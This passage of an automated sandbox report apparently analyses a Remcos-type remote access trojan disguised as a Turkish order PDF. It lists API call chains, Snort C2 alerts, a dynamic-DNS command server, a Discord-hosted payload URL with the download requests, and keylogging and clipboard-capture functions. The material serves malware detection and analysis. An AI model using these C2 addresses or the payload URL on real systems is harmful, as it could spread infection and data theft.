D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr 3_2_00410586
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 3_2_0040728F
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 3_2_0040477E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 3_2_00403325
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 3_2_00412BEE
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10548C1E getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose, 3_2_10548C1E
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10544CB4 FindFirstFileW, 3_2_10544CB4
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1055457D FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose, 3_2_1055457D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1054610D _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread, 3_2_1054610D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10546599 FindFirstFileW,FindNextFileW,FindClose, 3_2_10546599
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10548EAA getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose, 3_2_10548EAA
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10551F15 FindFirstFileW, 3_2_10551F15
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha 3_2_00403C4A

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2845323 ETPRO TROJAN MSIL/Remcos RAT CnC Keep-Alive (Outbound) 192.168.2.3:49778 -> 37.0.14.195:5017
Source: Traffic Snort IDS: 2844577 ETPRO TROJAN MSIL/Remcos RAT CnC Checkin M2 192.168.2.3:49778 -> 37.0.14.195:5017
Source: Traffic Snort IDS: 2845324 ETPRO TROJAN MSIL/Remcos RAT CnC Keep-Alive (Inbound) 37.0.14.195:5017 -> 192.168.2.3:49778
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: Pw`~hustlelord.ddns.net
Uses dynamic DNS services
Source: unknown DNS query: name: blessmyhustlelord.ddns.net
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WKD-ASIE WKD-ASIE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View IP Address: 162.159.130.233 162.159.130.233
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49746 -> 37.0.14.195:5017
Contains functionality to download and execute PE files
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_1054EE74 URLDownloadToFileW,ShellExecuteW,??3@YAXPAX@Z, 3_2_1054EE74
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.269381013.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.269349489.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/.
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/2y
Source: Eluiezilfw.exe, 00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwm
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00402149 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 3_2_00402149
Source: global traffic HTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1User-Agent: 21Host: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1User-Agent: 16Host: cdn.discordapp.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1User-Agent: 91Host: cdn.discordapp.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49751 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to capture and log keystrokes
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Esc] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Enter] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Tab] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Down] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Right] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Up] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Left] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [End] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [F2] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [F1] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Del] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Del] 3_2_00405EB2
Contains functionality to register a low level keyboard hook
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10546C64 SetWindowsHookExA 0000000D,004052BA,00000000,00000000 3_2_10546C64
Contains functionality to read the clipboard data
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait 3_2_0040D2A6
Creates a DirectInput object (often for capturing keystrokes)
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.308934385.000000000073A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx, 3_2_0040532D
Contains functionality for read data from the clipboard
